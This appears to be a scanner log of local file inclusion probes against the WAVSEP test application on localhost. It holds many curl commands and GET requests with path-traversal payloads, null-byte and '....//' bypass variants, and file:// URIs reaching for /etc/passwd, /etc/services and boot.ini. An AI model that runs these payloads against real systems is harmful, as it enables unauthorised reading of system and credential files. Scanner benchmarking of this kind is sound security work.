curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
